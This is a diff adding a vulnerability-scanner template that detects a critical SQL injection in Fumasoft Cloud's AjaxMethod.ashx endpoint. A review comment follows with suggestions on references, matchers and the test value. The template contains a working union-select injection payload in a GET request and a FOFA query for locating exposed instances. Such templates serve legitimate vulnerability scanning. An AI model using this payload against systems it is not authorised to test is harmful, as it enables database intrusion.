diff --git a/http/vulnerabilities/other/fumasoft-sqli.yaml b/http/vulnerabilities/other/fumasoft-sqli.yaml
new file mode 100644
index 0000000000..6faf0798e5
--- /dev/null
+++ b/http/vulnerabilities/other/fumasoft-sqli.yaml
@@ -0,0 +1,36 @@
+id: fumasoft-sqli
+
+info:
+ name: Fumasoft Cloud - SQL Injection
+ author: ritikchaddha
+ severity: critical
+ description: |
+ There is a SQL injection vulnerability in the AjaxMethod.ashx file of Fumasoft Cloud. Attackers can obtain server permissions through the vulnerability
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cwe-id: CWE-89
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: title="Fumeng Cloud"
+ tags: fumasoft,sqli
+
+variables:
+ num: "999999999"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','{{num}}')),3,32)--"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(num)}}'
+
+ - type: status
+ status:
+ - 500
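Review bot: The `info` block asserts a critical 9.8 rating but has no `reference:` or `remediation:` entry, so whoever triages a hit has nothing to check the finding against and no fix to apply; add both, and replace the vague "obtain server permissions" with what the endpoint actually exposes. The matcher pair (`{{md5(num)}}` in the body plus status `500`) presumably relies on the hash coming back inside a database error page, which deserves a comment above the status matcher such as `# hash is echoed in the server error response, hence 500`. Because `num` is the fixed `"999999999"`, the expected hash never changes and a cached or static page containing it would match, so a per-run value like `num: "{{rand_int(800000000, 1000000000)}}"` would reduce false positives. The `fofa-query` title reads "Fumeng Cloud" while `name` reads "Fumasoft Cloud"; confirm which string the product really uses.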